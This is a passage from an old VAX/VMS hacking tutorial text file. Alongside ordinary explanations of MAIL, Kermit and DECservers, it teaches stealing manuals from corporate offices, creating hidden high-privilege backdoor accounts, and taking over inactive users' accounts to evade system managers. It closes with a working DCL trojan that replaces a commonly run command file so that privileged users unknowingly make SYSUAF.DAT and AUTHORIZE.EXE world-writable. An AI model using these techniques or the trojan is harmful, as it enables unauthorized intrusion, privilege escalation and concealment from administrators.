  1642.  
  1643. The Mail Utility allows you to organize your messages by moving them into
  1644. folders.  To move a message to a folder, enter the MOVE command (while you are
  1645. reading the message) and press RETURN.  MAIL prompts you for a folder name.
  1646. Type any name, for example, REVIEWS or JOKES or STATUS_REPORTS.  MAIL also
  1647. prompts you for a file name.  You can specify the default mail file by pressing
  1648. RETURN.  A sample session demonstrating the MOVE command follows:
  1649.  
  1650. MAIL> 2
  1651. MAIL> MOVE
  1652. _Folder: HACKERS
  1653. _File: <RET>
  1654.  
  1655. Folder HACKERS does not exist.
  1656. Do you want to create it (Y/N, default is N)? Y
  1657. %MAIL-I-NEWFOLDER, folder HACKERS created
  1658.  
  1659. In this example, the folder name is HACKERS and the default mail file is
  1660. specified.  If the folder you name does not exist, MAIL asks you if you want to
  1661. create it.
  1662.  
  1663. Once you have created folders, you may want to move between them. To move from
  1664. one folder to another, use the SELECT command.  If you want to move to the
  1665. HACKERS folder, enter the SELECT command as follows:
  1666.  
  1667. MAIL> SELECT HACKERS
  1668.  
  1669. %MAIL-I-SELECTED, 1 message selected
  1670.  
  1671. In this example, MAIL displays a message indicating the number of messages in
  1672. the folder.
  1673.  
  1674. To move to a folder named JOKES, enter the following command line:
  1675.  
  1676. MAIL> SELECT JOKES
  1677.  
  1678. %MAIL-I-SELECTED, 32 messages selected
  1679.  
  1680.  
  1681. You can enter the DIRECTORY command to see a list of the messages in the folder
  1682. you just selected.
  1683.  
  1684. When you want to move a mail message from your mail file to a sequential file
  1685. that you can access from the DCL command level, use the EXTRACT command.
  1686. Enter the EXTRACT command (while you are reading the message) and press RETURN.
  1687. MAIL prompts you for the name of a file.  Then, when you exit from MAIL, the
  1688. file is listed in your directory.  The following example shows how to use the
  1689. EXTRACT command to move a mail message to a file named GAMES.DAT.
  1690.  
  1691. MAIL> EXTRACT
  1692. _File: GAMES.DAT
  1693.  
  1694. %MAIL-I-CREATED, DISK:[BERGMAN]GAMES.DAT;1 created
  1695.  
  1696. MAIL>
  1697.  
  1698. To print a hard copy of a mail message, enter the PRINT command while you are
  1699. reading the message and press RETURN.  (When you exit from MAIL, the message
  1700. enters the print queue.) The following example shows how to make a hard copy of
  1701. message #4 by using the PRINT command:
  1702.  
  1703. MAIL> 4
  1704.  
  1705.     #4          4-AUG-1989 09:39:20           MAIL
  1706. From:  SPARTA::FELLINI
  1707. To:    MARSTON
  1708. Subj:  Rydell's Reasons
  1709.  
  1710. In reference to the meeting of July 26, I would like to explain
  1711. Rydell's opinion more fully...
  1712.  
  1713. MAIL> PRINT
  1714.  
  1715. When you are ready to leave MAIL, enter the EXIT command and press RETURN.
  1716. Any messages marked for deletion disappear.  Any messages marked for printing
  1717. enter the print queue and the following message is displayed:
  1718.  
  1719. MAIL> EXIT
  1720. Job MAIL (queue ATLAS_PRINT, entry 43) started on QUEUE$LPA0
  1721.  
  1722.  
  1723. The next section is a detailed look at what is possibly the  most important of
  1724. the MAIL commands -- SEND
  1725.  
  1726. Format:   SEND  [filespec]
  1727.  
  1728. Sends a message to another user(s).  Use the SEND command and the MAIL command
  1729. interchangeably because they work the same way. MAIL prompts you first for the
  1730. name of the user(s) to receive the message.  You reply with the user name(s)
  1731. or with the file name of a distribution list file(s), in the following format:
  1732.  
  1733. [[nodename::]username,...] [,] [@listname[,...]]
  1734.  
  1735. If you have entered the SET CC_PROMPT command or used the /CC_PROMPT qualifier,
  1736. you can then specify names of users to receive carbon copies of the message at
  1737. the CC: prompt.
  1738.  
  1739. Next, MAIL prompts you for the subject of the mail.  To avoid the "Subj:"
  1740. prompt specify the /SUBJECT qualifier with the SEND command.
  1741.  
  1742. You can include a file specification with the SEND command.  If you specify a
  1743. file with the SEND command, the text in that file is sent to the specified
  1744. user(s).  If you do not specify a file, MAIL prompts you for the text of your
  1745. message.
  1746.  
  1747. Enter the message that you want to send; then press <CTRL-Z>.  Note that once
  1748. you have typed a line and pressed RETURN, there is no way to edit it. If you
  1749. decide not to send a message you are typing but want to stay within the Mail
  1750. Utility, press <CTRL-C> to abort the message.  You then receive the MAIL>
  1751. prompt.  CTRL-Z exits you from MAIL.
  1752.  
  1753.  
  1754. Examples
  1755. --------
  1756.  
  1757. 1.
  1758.    MAIL> SEND/LAST
  1759.    To:FLIGHT::MYERS
  1760.    Subj:Geometric Concepts
  1761.    MAIL>
  1762.  
  1763.  
  1764. This example shows how to send a copy of the last mail message you sent to a
  1765. user named Myers on node FLIGHT.
  1766.  
  1767. 2.
  1768.    MAIL> SEND/SELF/SUBJECT="Good Harbor"
  1769.    To:DAPPER::WAYNE
  1770.    Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:
  1771.  
  1772.  
  1773. This example shows how to send a mail message to a user named WAYNE on node
  1774. DAPPER.  The /SELF qualifier enables MAIL to send a copy of the same message
  1775. back to you.  The subject of the  message  is  Good Harbor. Since the /SUBJECT
  1776. qualifier was specified, there is no Subject: heading.
  1777.  
  1778. 3.
  1779.    MAIL> SEND
  1780.    To:BAKER,MARSTON,@SUPERVISORS
  1781.    Subject:Handling Stress
  1782.    Enter your message below.  Press CTRL-Z when complete, or CTRL-C to quit:
  1783.  
  1784.  
  1785. This example shows how to send a mail message to two users (BAKER and MARSTON)
  1786. and a distribution list (SUPERVISORS).
  1787.  
  1788. One of the important concepts relating to MAIL is the idea of FOLDERS.  All
  1789. mail files are subdivided into folders.  By default, your mail file (MAIL.MAI)
  1790. contains a folder called MAIL.  The MAIL folder contains messages that you have
  1791. already read.  When you receive new mail messages, they automatically enter
  1792. into a folder named NEWMAIL.  After you read the messages in the NEWMAIL
  1793. folder, they automatically move into the MAIL folder and the NEWMAIL folder
  1794. disappears.  When you delete a message it automatically moves into the
  1795. WASTEBASKET folder.  Deleted messages collect in the WASTEBASKET folder until
  1796. you empty it.  To emtpy the WASTEBASKET, enter either: EXIT or PURGE You can
  1797. create as many folders as you want.  You always know which folder you are
  1798. currently in because the name of the folder is displayed at the top right
  1799. corner of the screen when you enter the READ or DIRECTORY command.  You can
  1800. enter the DIRECTORY/FOLDER command to see a display of the existing folders in
  1801. the current mail file.  (use the MOVE command for creating new folders) You can
  1802. remove a folder by deleting all the messages that it contains.
  1803.  
  1804. A look at a sample MAIL heirarchy:
  1805.  
  1806.  
  1807.        [mailfile1]        [mailfile2]                 [mailfile3]
  1808.             !                  !                           !
  1809.             !            +-----+---------+            +----+---------+
  1810.         [folder1]    [folder1]        [folder2]       !              !
  1811.             !            !               !        [wastebasket]  [folder1]
  1812.             !          +-+-----+       message1       !              !
  1813.          message       !       !                   garbage1       message1
  1814.                    message1  message2
  1815.  
  1816.  
  1817.                           MAILFILE ---> FOLDERS ---> MESSAGES
  1818.  
  1819.  
  1820.  
  1821. MAIL COMMANDS OVERVIEW
  1822. ----------------------
  1823.  
  1824. Here I have provided a listing of all the commands that you can issue from the
  1825. mail utility and a brief description of what each one does:
  1826.  
  1827.  
  1828. Command            Description
  1829. -----------+-------------------------------------------------------------------
  1830. ANSWER     ! Same as the REPLY command.  See below
  1831. ATTACH     ! Allows you to switch to another process in your job
  1832. BACK       ! Displays the last message read
  1833. COMPRESS   ! Makes an indexed sequential mail file smaller
  1834. COPY       ! Copy a message to another folder, without deleting original
  1835. CURRENT    ! Displays the beginning of the message you are currently reading
  1836. DEFINE     ! Allows you to define keys as macros
  1837. DELETE     ! Delete a message
  1838. DIRECTORY  ! Displays a list of the messages in the current folder
  1839. EDIT       ! Enables you to edit a message before it is sent
  1840. ERASE      ! Clears the screen
  1841. EXIT       ! Exits from the MAIL utility
  1842. EXTRACT    ! Places a copy of the current message into a sequential file
  1843. FILE       ! Moves the current message to the specified folder
  1844. FIRST      ! Displays the first message in the current folder
  1845. FORWARD    ! Sends a copy of the message you just read to another user
  1846. KEYPAD     ! Define the keypad
  1847. LAST       ! Displays the last message in the current folder
  1848. MAIL       ! Sends messages to another user.  Identical to the SEND command
  1849. MOVE       ! Moves the current message to the specified folder
  1850. NEXT       ! Skips to the next message and displays it
  1851. PRINT      ! Dumps messages to the PRINTER
  1852. PURGE      ! Deletes all messages in the WASTEBASKET folder
  1853. QUIT       ! Quits MAIL without deleting messages in WASTEBASKET
  1854. READ       ! Displays your messages
  1855. REPLY      ! Sends a message to the sender of the message you are reading
  1856. SEARCH     ! Searches the current folder for the message containing a string
  1857. SELECT     ! Allows you to switch to another folder
  1858. SEND       ! Send a message to another user
  1859. SET-SHOW   ! Review or Modify various characteristics of the MAIL utility
  1860. SPAWN      ! Create a sub-process.  Often useful to the hacker...
  1861. -----------+-------------------------------------------------------------------
  1862.  
  1863.  
  1864. COMPILING PROGRAMS
  1865. ------------------
  1866.  
  1867. Once you are comfortable with the VAX/VMS operating system, you will probably
  1868. want to write yourself some useful little hacker utility programs.  Although
  1869. many can be simply written as DCL script files, often the occasion arises where
  1870. the use of a high-level language is necessitated.  Through a high-level
  1871. language you have full access to the system services, as well as a lot more
  1872. control of what you want the VAX to do.  Here I will very briefly show how to
  1873. write, compile and execute a basic program.  Creating executable files in other
  1874. languages follows the same overall procedures: To activate basic from the shell
  1875. type:
  1876.  
  1877. $basic
  1878.  
  1879. This should put you into the VAX-BASIC environment, and the terminal will print
  1880. READY on your screen.  If just typing BASIC doesn't work, you may want to try:
  1881.  
  1882. $mc basic
  1883.  
  1884. This sometimes works, but it should be noted that BASIC is not found on all
  1885. VAX's.  Some have it, some don't.  In any case, whenever you are editing a
  1886. program, you should never leave source code lying around.  The best way is to
  1887. edit the file on an online buffer editor, and then transmit the file.  It
  1888. should always be done in this manner unless your file is VERY large, and it
  1889. would be cumbersome to keep uploading it.  If you must, then to save your
  1890. creation onto the VAX, just type:
  1891.  
  1892. save "filename"
  1893.  
  1894. This will save the source code with a .BAS extension.  You should rename this &
  1895. hide it in some seldom checked directory.  After you have finalized your coding
  1896. you should create an executable file, download your source code, and then
  1897. delete the one online.  To create an executable file, first you must exit back
  1898. to DCL, do this by typing EXIT.  Then once in DCL type:
  1899.  
  1900. $compile filename.bas
  1901. $link filename
  1902. $delete filename.obj;*
  1903.  
  1904. Note that you can link multiple OBJ files together, just like in MS-DOS.  It
  1905. should also be noted that to create truly useful programs you will need to get
  1906. your hands on a system services manual.  Through the system services you can
  1907. gain all kinds of information about the system and any nodes that it is hooked
  1908. up to.
  1909.  
  1910. NOTE: type HELP in BASIC to get a complete list of all the commands and syntax
  1911.  
  1912.  
  1913. ATTAINING MANUALS
  1914. -----------------
  1915.  
  1916.     As you can see, if you are going to get anywhere, you will have to get your
  1917. hands on some manuals.  Perhaps the best book you should invest in is "VAX/VMS
  1918. INTERNALS AND DATA STRUCTURES".  This book concentrates on explaining all the
  1919. data structures as well as all the system service calls and how everything
  1920. basically works inside a VAX.  Once you have read and understood this book,
  1921. VAX/VMS kernal programming should become a snap.  Its available at most big
  1922. bookstores but it costs about $130 (Canadian funds).  You may also want to look
  1923. at your local library or University library, since they usually carry this book
  1924. and other ones you may want to grab. Aside from these places the next best
  1925. place to get major information is from the actual VAX/VMS manuals.
  1926.  
  1927. Unfortunately these cannot be bought at any store.  However there are several
  1928. ways you can get your hands on one.  One method is to go work at a company
  1929. during the summer that uses VAX'es.  Then just grab the manuals or better yet,
  1930. photocopy them.  (be forewarned though.  Theres several thousand pages worth of
  1931. useful info!) Or if you know someone else who works at such an establishment,
  1932. you can get them to heist the manuals for you.  Other good techniques are
  1933. taking guided tours of offices of large corporations.  This is the BEST method,
  1934. because you can usually pick up a lot of stuff.  Just make sure you go with a
  1935. friend (to distract the guide, lookout etc) and carry a school bag with you.
  1936. When they get to the computer room, start looking around.  Usually they will
  1937. have the manuals in some big shelf somewhere.  Just grab yourself whatever you
  1938. need.  Also keep a lookout for other useful info laying around such as system
  1939. accounts, dialups etc If you really need to find the number of a VAX and you
  1940. don't see it posted anywhere, then you should get yourself a cheap little
  1941. phone.  (you know those K-MART $4.99 jobs) Take the phone plug out of the jack,
  1942. plug in your phone and dial up your local ANI.  This will give you the phone
  1943. number to the dialup.  It should be noted that not all VAX's allow remote
  1944. logins.  This can be adjusted from the SYSUAF setup via the AUTHORIZE program.
  1945.  
  1946. Local ANI's for TORONTO are:
  1947.  
  1948. 997-8123
  1949. 997-1234
  1950. 997-1699
  1951.  
  1952. If you don't have any Local ANI's, then just ask around on your local
  1953. PHREAK/HACK boards.
  1954.  
  1955.  
  1956.  
  1957. CREATING/MODIFYING ACCOUNTS
  1958. ---------------------------
  1959.  
  1960. The job of creating, modifying and deleting users is performed via the image
  1961. AUTHORIZE.  This program is always found in the sys$system directory, and
  1962. requires at least the SYSPRV privilege.  If you do not have this (or SETPRV)
  1963. then you cannot execute this file.  Assuming you have hacked out an account
  1964. with the required privilege or you have via some mechanism boosted your privs,
  1965. then this is how to start up AUTHORIZE:
  1966.  
  1967. $sd sys$system
  1968. $run authorize
  1969.  
  1970.  
  1971. This will return you with the UAF prompt:
  1972.  
  1973. UAF>
  1974.  
  1975. At this point you can make modifications to the User Authorization File (UAF).
  1976. It should be noted that the two files that this program accesses are SYSUAF.DAT
  1977. and RIGHTSLIST.DAT, and both of these are found in the SYS$SYSTEM directory.
  1978. First, heres the quick and dirty way to create a new user:
  1979.  
  1980. UAF> add username /password=whatever/priv=setprv
  1981.  
  1982. This is basically the minimum requirements for creating a high-privileged user
  1983. on a system.  Of course, you should try and avoid adding new users in where
  1984. possible.  It is a much better idea to try and find an INACTIVE user who hasn't
  1985. logged in for quite a while and change their password to whatever you want.
  1986. This way, any system operator will not get suspicious because of a new
  1987. username.  In addition, when granting privileges to either your own user, or
  1988. modifying some other user, you should NEVER give them ALL privs.  The reason is
  1989. simple: IT STANDS OUT!  Anybody going through the sysuaf database can
  1990. immediately pick out such accounts, and you will be found out very quickly.  If
  1991. you must give all privs then the better way is to simply grant the SETPRV
  1992. privilege as the normal privilege.  (do not assign it as a default however) The
  1993. reason for this is that this will not stand out as much.  By not assigning it
  1994. as a default, if the real user happens to log in for any reason, they will not
  1995. see it as one of their privs when performing a SHOW PROC/PRIV.  The only way to
  1996. activate your hidden privileges is by issuing:
  1997.  
  1998. $set proc/priv=all
  1999.  
  2000.  
  2001. Here I will briefly outline the commands you can perform from UAF:
  2002.  
  2003. Command  Description
  2004. -------------------------------------------------------------------------------
  2005. ADD    !This as you know will add a new user. You may specify many qualifiers
  2006.        !when creating the account.  See the online HELP for further information.
  2007. COPY   !Allows you to copy any record in the UAF to a new user.
  2008. CREATE !Allows you to create either the RIGHTSLIST.DAT or NETUAF.DAT files if
  2009.        !they don't already exist.
  2010. DEFAULT!Allows you to change any item in the DEFAULT record in SYSUAF.DAT
  2011. EXIT   !Terminate authorize and go back to the VMS shell.
  2012. GRANT  !Grants an identifier name to a user UIC
  2013. LIST !Makes a listing file (SYSUAF.LIS) which gives information on the records
  2014. !specified.  MODIFY !Allows you to modify an existing user.  see below for
  2015. further discussion REMOVE !This allows you to delete an existing user record
  2016. RENAME !This allows you to change the username of a record REVOKE !Revokes an
  2017. identifier name from a username or UIC identifier SHOW !Allows you to view the
  2018. records in SYSUAF.DAT, RIGHTSLIST.DAT and !NETUAF.DAT
  2019. -------------------------------------------------------------------------------
  2020.  
  2021. The commands you will be using most from here are SHOW and MODIFY.  Show can be
  2022. used to isolate INACTIVE accounts (based on last login), failed login attempts
  2023. etc.  The MODIFY command will let you change any characteristic in any of the
  2024. records.  Below I will give a short discussion on some of the more important
  2025. qualifiers that can be specified.  Note that exactly the same thing applies to
  2026. the ADD command:
  2027.  
  2028. /ACCESS  -if the account is set up for no remote access or whatever, just
  2029.           include this qualifier (no parameters) to gain FULL access.
  2030. /DEFPRIV -your default privileges.  These are the privileges that are active
  2031.           upon login
  2032. /DIR     -the directory assigned to you upon login.  ie.  SYS$LOGIN
  2033. /DEVICE  -the drive that the directory is in.
  2034. /FLAGS   -this is an important one!  You can specify things such as CAPTIVE
  2035.           accounts, NODISUSER, and many others.
  2036. /LGICMD  -the file that is executed upon login.  Normal setting would be
  2037.           /LGICMD=login.com
  2038. /PASSWORD-primary password
  2039. /PRIORITY-CPU priority. Normal setting is 4
  2040. /PRIV    -your assigned privileges. Should NOT use ALL, very conspicuous.
  2041. /PWDMIN  -minimum password length
  2042. /UIC     -User Identification Code
  2043.  
  2044.  
  2045. On most systems you will find a file called ADDUSER.COM which allows the system
  2046. manager to create new users.  It is a DCL file which simplifies the task of
  2047. creating new users by prompting you for all the necessary parameters.  If this
  2048. file does not exist on the system, here I have outlined the manual method of
  2049. creating a new user (this is the FULL setup):
  2050.  
  2051. $sd sys$system
  2052. $run diskquota
  2053.  
  2054. NOTE: All variables that you must enter are in square brackets, eg. [uic]
  2055.  
  2056. QUOTA>add [uic] /perm=[quota]/overdraft=[overdraft]
  2057.  
  2058. Basically this sets up how much disk space is allotted to the user.  The quota
  2059. usually ranges from 1000 blocks to 100000 blocks.  The overdraft is usually 10%
  2060. of the quota.  A good setting to keep this at is around 20000 for the quota.
  2061.  
  2062. $create/dir/owner=[uic]/prot=(s,o=rwed,g,w) [directory]/log
  2063.  
  2064. This will add in your directory and set its protections.
  2065.  
  2066. $run authorize
  2067.  
  2068. UAF> add [username]/own=[fullname]/acco=[account]/dev=[device]/dir=[directory]-
  2069.      /uic=[uic],[privs]/passw=[password]
  2070.  
  2071. The items here are:
  2072. username  -the name you will use on the system, eg. SMITHJ
  2073. fullname  -your actual name, eg John Smith. (of course you don't use your REAL
  2074.            name!!)
  2075. account   -your account name, usually used for billing purposes
  2076. device    -the drive that contains your directory
  2077. directory -your login directory. Best to keep an existing one
  2078. uic       -your UIC remember format: [group,member]
  2079. password  -your account password. You can enter whatever you want here
  2080. privs     -your account privileges. Normal is TMPMBX and NETMBX.  If you must
  2081.            then specify SETPRV to give you full access to the system
  2082.  
  2083. That ties up this section.  For further information about a specific qualifier
  2084. just type HELP from the UAF> prompt.
  2085.  
  2086. KERMIT
  2087. ------
  2088.  
  2089. Kermit is a file transfer program found on most VAX systems.  It allows the
  2090. transfer of files over terminal lines from a remote KERMIT program to the local
  2091. KERMIT program.  Invoking Kermit can be done in several ways depending on the
  2092. system.  Usually the file is located in the SYS$SYSTEM directory.  The usual
  2093. method to start kermit is:
  2094.  
  2095. $kermit
  2096.  
  2097. NOTE: some machines it may be KERMIT-32 or some other variation.
  2098.  
  2099. This may vary on different machines, you may have to RUN the file, or it may
  2100. have to be passed parameters such as KERMIT 1200 or KERMIT 2400.  In any case
  2101. once you have initiated the program, you should get a kermit prompt:
  2102.  
  2103. KERMIT>
  2104.  
  2105. Here you can issue several different commands. Following is a list with brief
  2106. explanations:
  2107.  
  2108.  
  2109. COMMAND     DESCRIPTION
  2110. -------------------------------------------------------------------------------
  2111. connect   !connects you to a virtual terminal, issue AT commands from here.
  2112. exit      !return to DCL
  2113. quit      !return to DCL. Same as above
  2114. receive   !Single file download from another machine
  2115. get       !identical to receive
  2116. bye       !terminates a transaction with another kermit in server mode
  2117. finish    !same as above but doesn't exit to DCL
  2118. send      !Send a file to another machine
  2119. server    !causes kermit to enter server mode
  2120. set       !set parameters such as parity, delay etc
  2121. show      !show the parameters set up currently
  2122. status    !current status such as number of bytes transmitted etc
  2123. [spawn]   !spawn a subprocess
  2124. [local]   !enter VMS commands
  2125. -------------------------------------------------------------------------------
  2126.  
  2127. The last two commands (in brackets) are not always found on every system, but
  2128. briefly they allow you to spawn a subprocess (often useful when you are tied up
  2129. in a non-breakable account) and local which can again be used to spawn or issue
  2130. other DCL commands.  There are often other commands, varying on what version of
  2131. KERMIT is being run.  One important note is that SPAWN cannot be issued from a
  2132. CAPTIVE account, but LOCAL (or an equivalent) can.  However, if the system
  2133. manager is smart he may set up the UAF record to specify that only one process
  2134. can be active with that account at any one time.  If this is the case it will
  2135. give you a message telling you that you have exceeded the quota allocated.  The
  2136. only way around it is to actually modify the record in SYSUAF.DAT Obviously the
  2137. important commands are SEND,RECEIVE and CONNECT.  Once you issue CONNECT, you
  2138. can dial out long distance or whatever, just by using regular AT commands.
  2139. SEND and RECEIVE are self explanatory so I wont go into them.
  2140.  
  2141.  
  2142. DECSERVERS
  2143. ----------
  2144.  
  2145. This deserves a little bit of attention also.  Basically DECservers allow the
  2146. the user to easily switch between various nodes in a cluster.  Unless you are
  2147. logging in directly to a terminal, you will usually not encounter this.  If you
  2148. do, heres what you will see:
  2149.  
  2150. Enter Username>
  2151.  
  2152. Or something of the like.  At this point you should just type A or C or
  2153. whatever else.  It is just a terminal identifier and means absolutely nothing.
  2154. At this point you will get a prompt such as:
  2155.  
  2156. LOCAL>
  2157.  
  2158. Here you can do a limited number of commands.  The important ones are:
  2159.  
  2160. LOCAL> show users
  2161.  
  2162. This will show the users on the DECserver, and what machines they are connected
  2163. to etc.  To view all the machines on the server, type:
  2164.  
  2165. LOCAL> show nodes
  2166.  
  2167. This will present a list of the callable nodes.  To connect to any one of these
  2168. you would issue a command such as:
  2169.  
  2170. LOCAL> connect SBSU
  2171.  
  2172. This is assuming the nodename was SBSU.  That's basically all there is to the
  2173. DECservers.  The other commands are really not that useful to the beginning VAX
  2174. hacker but can nonetheless be referenced by typing HELP at the LOCAL prompt.
  2175.  
  2176.  
  2177. SYSTEM DUMP ANALYZER
  2178. --------------------
  2179.  
  2180.   Although the SDA is not really for beginners, it is such an important topic
  2181. that I thought I would give a really brief overview of what it is all about.
  2182. Basically to call up SDA, type:
  2183.  
  2184. $analyze/system
  2185.  
  2186. This will return you with the prompt:
  2187.  
  2188. SDA>
  2189.  
  2190. At this point you can do many great things.  Oh, before I continue, it should
  2191. be noted that you need CMKRNL privilege in order to run this program.  In any
  2192. case, once you get the SDA prompt, there are several interesting things you can
  2193. do.  Basically, SDA is a watching tool.  It lets you keep track of what other
  2194. processes on the system are doing.  To get information on another process just
  2195. type:
  2196.  
  2197. SDA> show process [username]
  2198.  
  2199. you should put in a person who is logged in where I have put the [username]
  2200. variable.  This will give you a page of useful information on that specific
  2201. process.  The interesting thing is that with the SDA, you can access any part
  2202. of memory, unlike EXAMINE from DCL.  You can for example get the PCB address
  2203. for a process and then go in and either view or modify things such as privs,
  2204. priority etc.  You can also view other processes type-ahead buffers, and see
  2205. what they are doing.  Like I stated earlier, this is a relatively advanced
  2206. topic and doesn't fit well into a beginners file, so I will leave it at this,
  2207. but here I will provide a diagram of the PCB block so that you can see which
  2208. bytes do what:
  2209.  
  2210.  
  2211.                         - SOFTWARE PCB DETAILED LAYOUT -
  2212.  
  2213.                     BLOCK 1                           BLOCK 2
  2214.  
  2215.               +---------------+                +---------------+
  2216. :pcb$l_sqfl   !               !                !               !:pcb$t_terminal
  2217.               +---------------+                !               !
  2218. :pcb$l_sqbl   !               !                +---------------+
  2219.               +---+---+-------+                !               ! :pcb$l_pqb
  2220. :pcb$b_type   !   !   !       ! :pcb$w_size    +---------------+
  2221.  pcb$b_pri    +---+---+---+---+                !               ! :pcb$l_efcs
  2222. :pcb$w_mtxcnt !       !   !   ! :pcb$b_astact  +---------------+
  2223.               +-------+---+---+  pcb$b_asten   !               ! :pcb$l_efc2p
  2224. :pcb$l_astqfl !               !                +---------------+
  2225.               +---------------+                !               ! :pcb$l_efc3p
  2226. :pcb$l_astqbl !               !                +---------------+
  2227.               +---------------+                !               ! :pcb$l_pid
  2228. :pcb$l_phypcb !               !                +---------------+
  2229.               +---------------+                !               ! :pcb$l_phd
  2230. :pcb$l_owner  !               !                +---------------+
  2231.               +---------------+                !               ! :pcb$t_lname
  2232. :pcb$l_wsswp  !               !                !               !
  2233.               +---------------+                !               !
  2234. :pcb$l_sts    !               !                +---------------+
  2235.               +---------------+                !               ! :pcb$l_jib
  2236. :pcb$lwtime   !               !                +---------------+
  2237.               +---+---+-------+                !               ! :pcb$q_priv
  2238. :pcb$b_wefc   !   !   !       ! :pcb$w_state   !               !
  2239.  pcb$b_prib   +---+---+-------+                +---------------+
  2240. :pcb$w_tmbu   !       !       ! :pcb$w_aptcnt  !               ! :pcb$l_arb
  2241.               +-------+-------+                +---------------+
  2242. :pcb$w_ppgcnt !       !       ! :pcb$w_gpgcnt  !               ! :pcb$l_uic
  2243.               +-------+-------+                +---------------+
  2244. :pcb$w_biocnt !       !       ! :pcb$w_astcnt  !               ! :pcb$l_lockqfl
  2245.               +-------+-------+                +---------------+
  2246. :pcb$w_diocnt !       !       ! :pcb$w_biolm   !               ! :pcb$l_lockqbl
  2247.               +-------+-------+                +---------------+
  2248. :pcb$w_prccnt !       !       ! :pcb$w_diolm   !               ! :pcb$l_dlckpri
  2249.               +-------+-------+                +---------------+
  2250.  
  2251. NOTE: BLOCK 2 is just a continuation of BLOCK 1.  The PCB is the Process
  2252.       Control Block which is assigned to each process. It holds all the
  2253.       relevant information for the particular process.  The address for
  2254.       the PCB is shown when you execute the SHOW PROCESS <user> from SDA
  2255.  
  2256. Note that when you are examining memory you can specify addresses in two ways:
  2257.  
  2258.       1) locationA:locationB   -from locationA to locationB
  2259.       2) locationA;numbytes    -from locationA to locationA+numbytes
  2260.  
  2261. FURTHER HELP
  2262. ------------
  2263.  
  2264. Like I have stressed throughout this file, the best way to learn about VMS is
  2265. to use the ONLINE HELP that is available on virtually every VAX.  You may have
  2266. also noticed that certain programs such as MAIL have self-contained help which
  2267. is not seemingly accessible from the normal HELP.  So how do you get that
  2268. information?!  Well, all the extra help files for programs such as MAIL, SDA,
  2269. AUTHORIZE, etc are all stored in the SYS$HELP directory.  The only problem is
  2270. that they are not in very human readable form.  To get a properly formatted
  2271. text output you can use the LIBRARY command.  Here is an example that dumps all
  2272. the help file on SDA into a file called SDA.HLP in your directory:
  2273.  
  2274. $library/extract=(*)/output=sys$login:sda sys$help:sda.hlb
  2275.  
  2276. Now to explain this line.  The library program will extract the SDA help file
  2277. (sys$help:sda.hlb) and put it into your login directory (sys$login:sda.hlp).
  2278. Where I have put the (*), you can alternatively put any number of commands that
  2279. you may want referenced.  The (*) will dump ALL the commands into the help file
  2280. For example to ONLY get the SHOW command and its qualifiers (for SDA) into a
  2281. file, you may try something like:
  2282.  
  2283. $library/extract=(show)/output=sys$login:sda_show  sys$help:sda.hlb
  2284.  
  2285. Since the files generated from this command is standard ASCII, you can read
  2286. these help files with the TYPE command, ie.
  2287.  
  2288. $type sys$login:sda.hlp
  2289.  
  2290. The same method can be utilized for any of the other commands to which you
  2291. normally do not have access, eg. AUTHORIZE, SDA etc.  This way you can learn
  2292. and understand the command without necessarily having the privilege of reading
  2293. it in the first place.  Of course I recommend that you read both the AUTHORIZE
  2294. and SDA files since they are probably the most useful files in the bunch.  To
  2295. get a list of the other help files, just do:
  2296.  
  2297. $dir sys$help:*.hlb
  2298.  
  2299. Then you can specify any of the listed files in the LIBRARY command. If you
  2300. create these files, just make sure you delete them, once you are through with
  2301. using them, especially if they are in someone elses ACTIVE account.
  2302.  
  2303.  
  2304.  
  2305. TROJAN HORSES
  2306. -------------
  2307.  
  2308. Lets suppose you have done all you can in trying to gain privileges, and you
  2309. have neither come up with a high level account, or any mechanism of boosting
  2310. your privs. Now what? Well the following methods I will describe should be able
  2311. to net you more privileges but there is one small problem.  These methods
  2312. usually involve modifying or creating new files in certain places.  If the
  2313. system manager were to notice such a file, he could simply perform a DIR/OWNER
  2314. and would know which account someone was hacking on, and he would no doubt
  2315. change the password or kill the account.  Now this is an IF situation. Although
  2316. theres a good chance you will get away with it, you still have that risk factor
  2317. that says that you may very well lose this particular VAX.  So if this is the
  2318. only VAX that you have access to, and you are still in the learning process,
  2319. don't try these techniques.  Once you have learned the operating system well
  2320. enough and feel that you can afford to lose the VAX if worst comes to worse
  2321. then you can proceed with these time honoured techniques:
  2322.  
  2323. Ok so what is a trojan horse?  Based on the original definitions for such
  2324. programs, a trojan is simply a file that you have someone execute which
  2325. performs some arbitrary task unbeknownst to the user.  Of course there are the
  2326. typical trojan programs that go through the logon sequence and try and procure
  2327. user/password combinations. This is fine, but what about other methods?  Its
  2328. fine for getting more accounts, some which may be possibly privileged, but you
  2329. still aren't guaranteed to get a good account.  So what do you do?!  Well, as
  2330. everyone should know by now, the easiest way to get more privileges is to give
  2331. them to your user via the AUTHORIZE program.  The problem is that on all VAXes,
  2332. the SYSUAF.DAT file is read/write protected and on some even the AUTHORIZE file
  2333. itself is protected.  The key is to unlock these files, so that they can be
  2334. accessed through the WORLD protection field.  The easiest way to do this is to
  2335. have a privileged user unwittingly do the dirty deed for you.  Here I will
  2336. describe a few methods of accomplishing such a task.
  2337.  
  2338.  The key here is to find a COM file that the users often use.  This could be
  2339. anything from some simple utility to a full featured DCL program such as
  2340. ADDUSER.COM.  What I usually do is search through the system symbols (SHOW
  2341. SYMBOL *) and logical table (SHOW LOGICAL) for definitions that are executed
  2342. via COM files.  Often you will find in the symbol table some weird utility
  2343. like NOTES that everybody executes. Lets assume you have found a prospective
  2344. program.  The next thing to check is to see if you write access to the
  2345. direcotry in which this file resides.  If you have READ access also, then you
  2346. can simply put in your TROJAN coding right within the main program (after
  2347. saving the original copy somewhere safe).  If you don't have read access, then
  2348. you can create a program with the same filename.  Since your program will have
  2349. a higher version number, it will get executed instead of the original program.
  2350. Then you perform your deed and delete the TROJAN and continue on and execute
  2351. the real COM file.  Here is an example, which is a fragment of a DCL routine
  2352. but can easily be changed to fit inside another routine.
  2353.  
  2354.  
  2355. $ pre_prvs=f$setprv("setprv")
  2356. $ if f$privilege("setprv") then goto fix
  2357. $ @notes.com;55
  2358. $ fix:
  2359. $ set prot sys$system:sysuaf.dat/prot=(w:rwed)
  2360. $ set prot sys$system:authorize.exe/prot=(w:rwed)
  2361. $ pre_prvs=f$setprv(pre_prvs)
  2362. $ @notes.com;55
  2363.  
  2364.  
  2365. In this example we have created another file called notes.com;56 in the proper
  2366. directory.  Whenever someone types in NOTES this file gets executed instead of
  2367. the original.  When control is passed here, it checks if the user has SETPRV
